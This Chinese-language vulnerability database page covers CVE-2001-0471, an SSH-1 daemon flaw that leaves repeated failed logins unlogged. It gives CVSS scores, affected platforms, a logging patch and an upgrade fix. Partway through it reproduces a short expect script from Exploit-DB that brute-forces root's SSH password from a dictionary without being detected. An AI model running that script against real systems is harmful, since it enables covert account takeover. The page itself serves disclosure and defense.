CVE-2001-0471
CVSS7.5
发布时间 :2001-06-27 00:00:00
修订时间 :2008-09-05 16:24:11
NMCOES    

[原文]SSH daemon version 1 (aka SSHD-1 or SSH-1) 1.2.30 and earlier does not log repeated login attempts, which could allow remote attackers to compromise accounts without detection via a brute force attack.


[CNNVD]SSH1 SSH守护进程登录失败漏洞(CNNVD-200106-166)

        SSH守护进程1 (也称为SSHD-1或者SSH-1) 1.2.30及其早期版本不记录重复登录尝试。远程攻击者借助强力攻击危害没有侦察到的账户。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0471
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0471
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-166
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2345
(VENDOR_ADVISORY)  BID  2345
http://www.securityfocus.com/archive/1/160648
(VENDOR_ADVISORY)  BUGTRAQ  20010205 SSHD-1 Logging Vulnerability

- 漏洞信息

SSH1 SSH守护进程登录失败漏洞
高危 设计错误
2001-06-27 00:00:00 2006-09-05 00:00:00
远程  
        SSH守护进程1 (也称为SSHD-1或者SSH-1) 1.2.30及其早期版本不记录重复登录尝试。远程攻击者借助强力攻击危害没有侦察到的账户。

- 公告与补丁

        Patch supplied by Jose Nazario :
        --- ssh-1.2.30/sshd.c.orig Wed Jan 31 12:11:08 2001
        +++ ssh-1.2.30/sshd.c Wed Jan 31 12:57:36 2001
        @@ -2408,7 +2408,7 @@
         remote_user_name = client_user;
         break;
         }
        - debug("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
        + log_msg("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
         user, client_user, get_canonical_hostname());
         xfree(client_user);
         break;
        @@ -2469,7 +2469,7 @@
         mpz_clear(&client_host_key_n);
         break;
         }
        - debug("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
        + log_msg("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
         user, client_user, get_canonical_hostname());
         xfree(client_user);
         mpz_clear(&client_host_key_e);
        @@ -2500,7 +2500,7 @@
         break;
         }
         mpz_clear(&n);
        - debug("RSA authentication for %.100s failed.", user);
        + log_msg("RSA authentication for %.100s failed.", user);
         }
         break;
        @@ -2633,7 +2633,7 @@
         authenticated = 1;
         break;
         } else {
        - debug("TIS authentication for %.100s failed",user);
        + log_msg("TIS authentication for %.100s failed",user);
         memset(password, 0, strlen(password));
         xfree(password);
         break;
        @@ -2672,7 +2672,7 @@
         if (password_attempts > 0)
         {
         /* Log failures if attempted more than once. */
        - debug("Password authentication failed for user %.100s from %.100s.",
        + log_msg("Password authentication failed for user %.100s from %.100s.",
        user, get_canonical_hostname());
         }
         password_attempts++;
        @@ -2693,7 +2693,7 @@
         authenticated = 1;
         break;
         }
        - debug("Password authentication for %.100s failed.", user);
        + log_msg("Password authentication for %.100s failed.", user);
         memset(password, 0, strlen(password));
         xfree(password);
         break;
        SSH Communications Security SSH 1.2.30
        

- 漏洞信息 (20615)

SSH 1.2.30 Daemon Logging Failure Vulnerability (EDBID:20615)
unix remote
2001-02-05 Verified
0 Jose Nazario
N/A [点击下载]
source: http://www.securityfocus.com/bid/2345/info

SSH1 is the implementation of the Secure Shell communication protocol by SSH Communications. SSH1 is version 1 of the protocol specified by IETF draft to protect the integrity of traffic over the network.

A problem with the implementation of the SSH1 daemon could allow an attacker to by-pass numerous attempts at brute force cracking a system. The logging routine in the SSH1 code does not capture failed attempts beyond the fourth attempt. In a brute force attack scenario, there are numerous successive attempts at logging in as a specific user. This danger is escalated by the SSH1 package allowing remote root logins by default.

It is possible for a remote user with malicious intent to launch a brute force attack against a system and successfully remain unnoticed by system logging utilities beyond the fourth attempted login. By use of this method, it is possible for the remote user to gain access to any account, and potentially the root account. 

#!/usr/bin/expect -f
#
# simple expect exploit to brute force root's password via ssh without
# detection.. see CLABS200101 for info on this exploit.
#
# this is beerware, just buy me a beer at defcon if you like this.
# build your own dictionary, use at your own risk, no warranty, etc.
#
# jose@crimelabs.net		january, 2001
#
set timeout 3
set target [lindex $argv 0]
set dictionary [lindex $argv 1]

if {[llength $argv] !=  2} {
   puts stderr "Usage: $argv0 root@target dictionary\n"
   exit }

set tryPass [open $dictionary r]

foreach passwd [split [read $tryPass] "\n"] {
  spawn ssh $target
  expect ":"
  send "$passwd\n"
  expect "#" { puts "password is $passwd\n" ; exit }
  set id [exp_pid]
  exec kill -INT $id
}
		

- 漏洞信息

8038
SSH-1 Account Login Attempt Logging Failure
Remote / Network Access Other
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

SSH Daemon does not log repeated login attempts. An attacker can use this to attempt to brute force the accounts on this system resulting in a loss of integrity.

- 时间线

2001-02-05 Unknow
2001-02-05 Unknow

- 解决方案

Upgrade to version 1.2.31 or higher, as it has been reported to fix this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SSH1 SSH Daemon Logging Failure Vulnerability
Design Error 2345
Yes No
2001-02-05 12:00:00 2009-07-11 04:46:00
This vulnerability was announced to Bugtraq by Jose Nazario <jose@crimelabs.net> in a Crimelabs Security Note on February 5, 2001.

- 受影响的程序版本

SSH Communications Security SSH 1.2.30
- BSDI BSD/OS 4.0.1
- BSDI BSD/OS 4.0
- BSDI BSD/OS 3.1
- Caldera OpenLinux 2.4
- Debian Linux 2.2
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- OpenBSD OpenBSD 2.8
- Red Hat Linux 6.2
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- Sun Solaris 2.5.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6

- 漏洞讨论

SSH1 is the implementation of the Secure Shell communication protocol by SSH Communications. SSH1 is version 1 of the protocol specified by IETF draft to protect the integrity of traffic over the network.

A problem with the implementation of the SSH1 daemon could allow an attacker to by-pass numerous attempts at brute force cracking a system. The logging routine in the SSH1 code does not capture failed attempts beyond the fourth attempt. In a brute force attack scenario, there are numerous successive attempts at logging in as a specific user. This danger is escalated by the SSH1 package allowing remote root logins by default.

It is possible for a remote user with malicious intent to launch a brute force attack against a system and successfully remain unnoticed by system logging utilities beyond the fourth attempted login. By use of this method, it is possible for the remote user to gain access to any account, and potentially the root account.

- 漏洞利用

Exploit contributed by Jose Nazario &lt;jose@crimelabs.net&gt; .

- 解决方案

Patch supplied by Jose Nazario <jose@crimelabs.net> :

--- ssh-1.2.30/sshd.c.orig Wed Jan 31 12:11:08 2001
+++ ssh-1.2.30/sshd.c Wed Jan 31 12:57:36 2001
@@ -2408,7 +2408,7 @@
remote_user_name = client_user;
break;
}
- debug("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
+ log_msg("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
user, client_user, get_canonical_hostname());
xfree(client_user);
break;
@@ -2469,7 +2469,7 @@
mpz_clear(&client_host_key_n);
break;
}
- debug("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
+ log_msg("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
user, client_user, get_canonical_hostname());
xfree(client_user);
mpz_clear(&client_host_key_e);
@@ -2500,7 +2500,7 @@
break;
}
mpz_clear(&n);
- debug("RSA authentication for %.100s failed.", user);
+ log_msg("RSA authentication for %.100s failed.", user);
}
break;

@@ -2633,7 +2633,7 @@
authenticated = 1;
break;
} else {
- debug("TIS authentication for %.100s failed",user);
+ log_msg("TIS authentication for %.100s failed",user);
memset(password, 0, strlen(password));
xfree(password);
break;
@@ -2672,7 +2672,7 @@
if (password_attempts > 0)
{
/* Log failures if attempted more than once. */
- debug("Password authentication failed for user %.100s from %.100s.",
+ log_msg("Password authentication failed for user %.100s from %.100s.",

user, get_canonical_hostname());
}
password_attempts++;
@@ -2693,7 +2693,7 @@
authenticated = 1;
break;
}
- debug("Password authentication for %.100s failed.", user);
+ log_msg("Password authentication for %.100s failed.", user);
memset(password, 0, strlen(password));
xfree(password);
break;


SSH Communications Security SSH 1.2.30

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站